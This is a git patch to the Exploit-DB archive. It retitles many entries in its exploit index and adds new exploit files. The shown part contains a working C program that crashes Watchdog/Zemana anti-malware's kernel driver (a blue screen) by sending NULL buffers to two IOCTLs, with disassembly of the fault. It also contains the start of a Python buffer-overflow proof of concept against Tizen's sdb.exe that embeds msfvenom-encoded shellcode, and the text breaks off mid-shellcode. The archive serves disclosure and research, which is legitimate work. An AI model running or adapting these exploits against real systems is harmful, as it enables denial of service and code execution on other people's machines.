From b4050a4e4b30e701b994cb42e50477bf36e77448 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 28 Oct 2017 05:01:35 +0000 Subject: [PATCH] DB: 2017-10-28 3 new exploits Boloto Media Player 1.0.0.9 - pls file Denial of Service Boloto Media Player 1.0.0.9 - '.pls' File Denial of Service HP Operations Manager 8.16 - 'srcvw4.dll' LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC) HP Operations Manager 8.16 - 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC) id software quake ii server 3.2 - Multiple Vulnerabilities ID Software Quake II Server 3.2 - Multiple Vulnerabilities Couchdb 1.5.0 - uuids Denial of Service Couchdb 1.5.0 - 'uuids' Denial of Service Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference Tizen Studio 1.3 Smart Development Bridge <2.3.2 - Buffer Overflow (PoC) Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion) Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion) Linux Kernel < 2.6.22 - 'ftruncate()/open()' Privilege Escalation Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Privilege Escalation MinaliC WebServer 1.0 - Remote Source Disclosure/File Download MinaliC WebServer 1.0 - Remote Source Disclosure / File Download PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit) PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit) ISC BIND 8.1 - host Remote Buffer Overflow ISC BIND 8.1 - Host Remote Buffer Overflow Mozilla Firefox 3.5.3 and SeaMonkey 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow DameWare Remote Controller <= 12.0.0.520 - Remote Code Execution RunCMS 1.6 - Blind SQL Injection (IDS evasion) RunCMS 1.6 - Blind SQL Injection (IDS Evasion) glFusion 1.1.2 - COM_applyFilter()/order SQL Injection glFusion 1.1.2 - 'COM_applyFilter()/order' SQL Injection glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection glFusion 1.1.2 - 'COM_applyFilter()/cookies' Blind SQL Injection Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection Geeklog 1.5.2 - 'savepreferences()/*blocks[]' SQL Injection --- files.csv | 31 +++--- platforms/windows/dos/43058.c | 141 ++++++++++++++++++++++++ platforms/windows/dos/43060.py | 176 ++++++++++++++++++++++++++++++ platforms/windows/remote/43059.py | 79 ++++++++++++++ 4 files changed, 413 insertions(+), 14 deletions(-) create mode 100755 platforms/windows/dos/43058.c create mode 100755 platforms/windows/dos/43060.py create mode 100755 platforms/windows/remote/43059.py diff --git a/files.csv b/files.csv index f4faa7e78..977d2f661 100644 --- a/files.csv +++ b/files.csv @@ -1223,7 +1223,7 @@ id,file,description,date,author,platform,type,port 9823,platforms/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd - Denial of Service",2009-09-24,"Jeremy Brown",solaris,dos,0 9845,platforms/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 -9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file Denial of Service",2009-10-27,Dr_IDE,windows,dos,0 +9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - '.pls' File Denial of Service",2009-10-27,Dr_IDE,windows,dos,0 9874,platforms/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - Denial of Service",2009-10-26,"Usman Saeed",windows,dos,0 9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - Denial of Service",2009-10-20,bellick,windows,dos,7144 9881,platforms/windows/dos/9881.txt,"Eureka Email Client 2.2q - Buffer Overflow (PoC)",2009-10-23,"Francis Provencher",windows,dos,110 @@ -1506,7 +1506,7 @@ id,file,description,date,author,platform,type,port 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0 12294,platforms/windows/dos/12294.txt,"Avtech Software - ActiveX 'avc781viewer.dll' Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Modem Reset (Denial of Service)",2010-04-19,hkm,hardware,dos,0 -12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0 +12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0 12314,platforms/windows/dos/12314.py,"Speed Commander 13.10 - '.zip' Memory Corruption",2010-04-20,TecR0c,windows,dos,0 12324,platforms/multiple/dos/12324.py,"Multiple Browsers - Audio Tag Denial of Service",2010-04-21,"Chase Higgins",multiple,dos,0 12334,platforms/linux/dos/12334.c,"OpenSSL - Remote Denial of Service",2010-04-22,Andi,linux,dos,0 @@ -3261,7 +3261,7 @@ id,file,description,date,author,platform,type,port 24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP - '.WAV' File Handler Denial of Service",2004-10-22,HexView,windows,dos,0 24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6 - Font Tag Denial of Service",2004-10-26,"Jehiah Czebotar",windows,dos,0 24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0 -24710,platforms/multiple/dos/24710.txt,"id software quake ii server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0 +24710,platforms/multiple/dos/24710.txt,"ID Software Quake II Server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0 24715,platforms/multiple/dos/24715.txt,"Caudium 1.x - Remote Denial of Service",2004-10-30,"David Gourdelier",multiple,dos,0 24726,platforms/windows/dos/24726.txt,"Software602 602 LAN Suite - Multiple Remote Denial of Service Vulnerabilities",2004-11-06,"Luigi Auriemma",windows,dos,0 24733,platforms/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service",2004-11-12,"Luigi Auriemma",windows,dos,0 @@ -4095,7 +4095,7 @@ id,file,description,date,author,platform,type,port 32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - '.wav' Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 -32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids Denial of Service",2014-03-26,"Krusty Hack",multiple,dos,0 +32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - 'uuids' Denial of Service",2014-03-26,"Krusty Hack",multiple,dos,0 32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - '.m3u' / '.pls' / '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - '.m3u' / '.pls '/ '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 32522,platforms/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,windows,dos,0 @@ -5721,6 +5721,8 @@ id,file,description,date,author,platform,type,port 43014,platforms/linux/dos/43014.txt,"Xen - Unbounded Recursion in Pagetable De-typing",2017-10-18,"Google Security Research",linux,dos,0 43020,platforms/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",multiple,dos,0 43026,platforms/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service",2017-10-21,"Berk Cem Göksel",windows,dos,0 +43058,platforms/windows/dos/43058.c,"Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference",2017-10-26,"Parvez Anwar",windows,dos,0 +43060,platforms/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge <2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -6236,7 +6238,7 @@ id,file,description,date,author,platform,type,port 4564,platforms/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,multiple,local,0 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)",2007-10-27,bunker,multiple,local,0 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)",2007-10-27,bunker,multiple,local,0 -4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0 +4572,platforms/multiple/local/4572.txt,"Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion)",2007-10-27,sh2kerr,multiple,local,0 4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x - '.m3u' Local Stack Overflow",2007-10-29,TaMBaRuS,windows,local,0 4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0 4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0 @@ -6305,7 +6307,7 @@ id,file,description,date,author,platform,type,port 6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0 6825,platforms/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0 6831,platforms/windows/local/6831.cpp,"TugZip 3.00 Archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",windows,local,0 -6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()/open()' Privilege Escalation",2008-10-27,gat3way,linux,local,0 +6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Privilege Escalation",2008-10-27,gat3way,linux,local,0 6994,platforms/windows/local/6994.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (1)",2008-11-05,Elazar,windows,local,0 7006,platforms/windows/local/7006.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (2)",2008-11-05,"Debasis Mohanty",windows,local,0 7051,platforms/windows/local/7051.pl,"VideoLAN VLC Media Player < 0.9.6 - '.rt' Stack Buffer Overflow",2008-11-07,SkD,windows,local,0 @@ -10935,7 +10937,7 @@ id,file,description,date,author,platform,type,port 15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0 15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0 15333,platforms/windows/remote/15333.txt,"MinaliC WebServer 1.0 - Directory Traversal",2010-10-27,"John Leitch",windows,remote,0 -15336,platforms/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0 +15336,platforms/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure / File Download",2010-10-27,Dr_IDE,windows,remote,0 15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0 15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0 @@ -11697,7 +11699,7 @@ id,file,description,date,author,platform,type,port 17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - 'SVG Layout' Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0 -17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0 +17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote,0 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0 17986,platforms/osx/remote/17986.rb,"Apple Safari - 'file://' Arbitrary Code Execution (Metasploit)",2011-10-17,Metasploit,osx,remote,0 @@ -12305,7 +12307,7 @@ id,file,description,date,author,platform,type,port 20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution",2000-10-29,"Mark Stratman",cgi,remote,0 20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW - smbclient Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0 20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval",2000-10-26,@stake,hardware,remote,0 -20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0 +20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - Host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0 20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0 20384,platforms/windows/remote/20384.txt,"Microsoft IIS 4.0/5.0 - Executable File Parsing",2000-11-06,Nsfocus,windows,remote,0 20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 - search.pl Arbitrary Command Execution",2000-11-07,rpc,cgi,remote,0 @@ -14773,7 +14775,7 @@ id,file,description,date,author,platform,type,port 33645,platforms/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Directory Traversal",2010-02-15,fb1h2s,windows,remote,0 33310,platforms/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",multiple,remote,0 33311,platforms/linux/remote/33311.txt,"KDE 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0 -33313,platforms/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 and SeaMonkey 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote,0 +33313,platforms/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote,0 33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0 33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0 33594,platforms/windows/remote/33594.txt,"Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution",2010-02-09,"Sumit Gwalani",windows,remote,0 @@ -15927,6 +15929,7 @@ id,file,description,date,author,platform,type,port 43031,platforms/lin_x86/remote/43031.rb,"Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,1743 43032,platforms/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote,0 43055,platforms/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)",2017-10-25,Metasploit,hardware,remote,0 +43059,platforms/windows/remote/43059.py,"DameWare Remote Controller <= 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -18968,7 +18971,7 @@ id,file,description,date,author,platform,type,port 4789,platforms/php/webapps/4789.php,"PMOS Help Desk 2.4 - Remote Command Execution",2007-12-25,EgiX,php,webapps,0 4790,platforms/php/webapps/4790.txt,"RunCMS 1.6 - Multiple Vulnerabilities",2007-12-25,DSecRG,php,webapps,0 4791,platforms/php/webapps/4791.txt,"eSyndiCat Link Exchange Script 2005-2006 - SQL Injection",2007-12-25,EgiX,php,webapps,0 -4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS evasion)",2007-12-26,sh2kerr,php,webapps,0 +4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS Evasion)",2007-12-26,sh2kerr,php,webapps,0 4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A (All Modules) - SQL Injection",2007-12-26,JosS,php,webapps,0 4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0 4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0 @@ -21556,7 +21559,7 @@ id,file,description,date,author,platform,type,port 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0 8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - Remote Command Execution",2009-03-27,Osirys,php,webapps,0 -8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - COM_applyFilter()/order SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0 +8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - 'COM_applyFilter()/order' SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0 8304,platforms/php/webapps/8304.txt,"Arcadwy Arcade Script - (Authentication Bypass) Insecure Cookie Handling",2009-03-29,ZoRLu,php,webapps,0 8305,platforms/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple SQL Injections",2009-03-29,boom3rang,php,webapps,0 8307,platforms/asp/webapps/8307.txt,"Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass",2009-03-30,AnGeL25dZ,asp,webapps,0 @@ -21577,7 +21580,7 @@ id,file,description,date,author,platform,type,port 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - 'page' SQL Injection",2009-04-01,cOndemned,php,webapps,0 8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],php,webapps,0 8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'Panel' Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0 -8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0 +8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - 'COM_applyFilter()/cookies' Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0 8348,platforms/php/webapps/8348.txt,"form2list - 'page.php?id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0 8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0 Beta - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],php,webapps,0 @@ -21632,7 +21635,7 @@ id,file,description,date,author,platform,type,port 8442,platforms/php/webapps/8442.txt,"Job2C - 'conf.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - 'adtype' Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0 8446,platforms/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - 'lang_file' Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0 -8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0 +8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - 'savepreferences()/*blocks[]' SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - Authentication Bypass",2009-04-16,Dns-Team,php,webapps,0 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0 diff --git a/platforms/windows/dos/43058.c b/platforms/windows/dos/43058.c new file mode 100755 index 000000000..80576162e --- /dev/null +++ b/platforms/windows/dos/43058.c @@ -0,0 +1,141 @@ +/* + +Exploit Title - Watchdog Development Anti-Malware/Online Security Pro Null Pointer Dereference +Date - 26th October 2017 +Discovered by - Parvez Anwar (@parvezghh) +Vendor Homepage - https://www.watchdogdevelopment.com/ +Tested Version - 2.74.186.150 +Driver Version - 2.21.63 - zam32.sys +Tested on OS - 32bit Windows 7 SP1 +CVE IDs - CVE-2017-15920 and CVE-2017-15921 +Vendor fix url - Will be fixed in a future release +Fixed Version - n/a +Fixed driver ver - n/a + + + +A null pointer dereference vulnerability is triggered when sending an operation +to ioctls 0x80002010 or 0x80002054. This is due to input buffer being NULL or +the input buffer size being 0 as they are not validated. + +kd> dt nt!_irp @esi -r + +0x000 Type : 0n6 + +0x002 Size : 0x94 + +0x004 MdlAddress : (null) + +0x008 Flags : 0x60000 + +0x00c AssociatedIrp : + +0x000 MasterIrp : (null) + +0x000 IrpCount : 0n0 + +0x000 SystemBuffer : (null) <----------- null pointer + + +0x80002010 +---------- +CVE-2017-15921 + +kd> r +eax=00000000 ebx=80002010 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001 +eip=9087cd9f esp=a7a80ab8 ebp=a7a80ab8 iopl=0 nv up ei pl nz na po nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202 +zam32+0xdd9f: +9087cd9f ff30 push dword ptr [eax] ds:0023:00000000=???????? + + +.text:90AD9104 push offset aIoctl_register ; "IOCTL_REGISTER_PROCESS" +.text:90AD9109 push 0 +.text:90AD910B push edx ; Pointer to "DeviceIoControlHandler" string +.text:90AD910C push 208h +.text:90AD9111 push offset aMain_c +.text:90AD9116 push 1 +.text:90AD9118 call sub_90AD3ADA +.text:90AD911D add esp, 18h +.text:90AD9120 push esi ; esi is null becomes arg_0 otherwise would point to our input "SystemBuffer" +.text:90AD9121 call sub_90AD8D90 + +.text:90AD8D90 sub_90AD8D90 proc near +.text:90AD8D90 +.text:90AD8D90 arg_0 = dword ptr 8 +.text:90AD8D90 +.text:90AD8D90 push ebp +.text:90AD8D91 mov ebp, esp +.text:90AD8D93 call sub_90AD414A +.text:90AD8D98 test eax, eax +.text:90AD8D9A jz short loc_90AD8DA6 +.text:90AD8D9C mov eax, [ebp+arg_0] ; Null pointer dereference +.text:90AD8D9F push dword ptr [eax] ; BSOD !!!! +.text:90AD8DA1 call sub_90AD428C +.text:90AD8DA6 +.text:90AD8DA6 loc_90AD8DA6: +.text:90AD8DA6 pop ebp +.text:90AD8DA7 retn 4 +.text:90AD8DA7 sub_90AD8D90 endp +.text:90AD8DA7 +.text:90AD8DAA + + +0x80002054 +---------- +CVE-2017-15920 + +kd> r +eax=861e8320 ebx=80002054 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001 +eip=9087d41a esp=99f4eaac ebp=99f4eadc iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 +zam32+0xe41a: +9087d41a c7061e010000 mov dword ptr [esi],11Eh ds:0023:00000000=???????? + + +.text:90AD9401 push offset aIoctl_get_driv ; IOCTL_GET_DRIVER_PROTOCOL +.text:90AD9406 push 0 +.text:90AD9408 push edx +.text:90AD9409 push 2A3h +.text:90AD940E push offset aMain_c +.text:90AD9413 push 1 +.text:90AD9415 call sub_90AD3ADA +.text:90AD941A mov dword ptr [esi], 11Eh ; BSOD !!!! Null pointer dereference otherwise would point to our input "SystemBuffer" +.text:90AD9420 jmp loc_90AD9622 + + +*/ + + +#include +#include + +int main(int argc, char *argv[]) +{ + HANDLE hDevice; + char devhandle[MAX_PATH]; + DWORD dwRetBytes = 0; + + + sprintf(devhandle, "\\\\.\\%s", "zemanaantimalware"); + + hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); + + if(hDevice == INVALID_HANDLE_VALUE) + { + printf("\n[-] Open %s device failed\n\n", devhandle); + return -1; + } + else + { + printf("\n[+] Open %s device successful", devhandle); + } + + printf("\n[~] Press any key to continue . . ."); + getch(); + + DeviceIoControl(hDevice, 0x80002010, NULL, 0, NULL, 0, &dwRetBytes, NULL); +// DeviceIoControl(hDevice, 0x80002054, NULL, 0, NULL, 0, &dwRetBytes, NULL); + + printf("\n[+] DoSed\n\n"); + + CloseHandle(hDevice); + return 0; +} + + + + + diff --git a/platforms/windows/dos/43060.py b/platforms/windows/dos/43060.py new file mode 100755 index 000000000..f34bd53ec --- /dev/null +++ b/platforms/windows/dos/43060.py @@ -0,0 +1,176 @@ +# Exploit Title: Smart Development Bridge <=2.3.2 (part of Tizen Studio 1.3 Windows x86/x64) - Buffer Overflow PoC +# Date: 22.10.17 +# Exploit Author: Marcin Kopec +# Vendor Homepage: https://developer.tizen.org/ +# Software Link: https://developer.tizen.org/development/tizen-studio/download# +# Version: 2.3.0, 2.3.2 (some older versions are affected as well) +# Tested on: Microsoft Windows [Version 10.0.16299.19] +# 2.3.2 (sdb.exe can be extracted from Tizen Studio 1.3 for Windows x86/x64 installation package): +# e88de99ee069412b7612d85c00aa62fc sdb.exe +# 2.3.0: +# f9fd3896195900ec604c6f182a411e18 sdb.exe +# The file can be located in "tools" subdirectory after the extraction + +# This code has been created for educational purposes only, to raise awareness on software security, and it's harmless +# by intention (the PoC runs calc.exe). Please do not change the code behaviour to malicious + +# Vulnerability Discovery History +# 28/Jul/16 - Tizen Project has been informed about the vulnerability (https://bugs.tizen.org/browse/TM-249) +# 28/Jul/16 - Got suggestion from CL to inform Tizen Mobile project +# 29/Jul/16 - Moved the issue to Tizen Mobile project +# - NO RESPONSE - +# 7/Sep/16 - Escalated through Samsung security contact (BZ) +# 14/Nov/16 - Got informed by BZ that HQ is dealing with the issue with no further details +# - NO RESPONSE - +# 02/Oct/17 - Tizen Mobile project has been informed about plans to release PoC on exploit-db +# - NO RESPONSE - +# 22/Oct/17 - The PoC submitted to exploit-db + + +import struct +import subprocess +import sys + +ARGS = " launch A A A A A " + + +def tech_direct_exec(sdb_path): + # msfvenom -a x86 --platform Windows -p windows/exec CMD=calc -e x86/shikata_ga_nai \ + # -b '\x00\x20\x0a\x0d\x1b\x0b\x0c' -f python + buf = "" + buf += "\xb8\xb6\x98\xe6\xfa\xdb\xcb\xd9\x74\x24\xf4\x5b\x31" + buf += 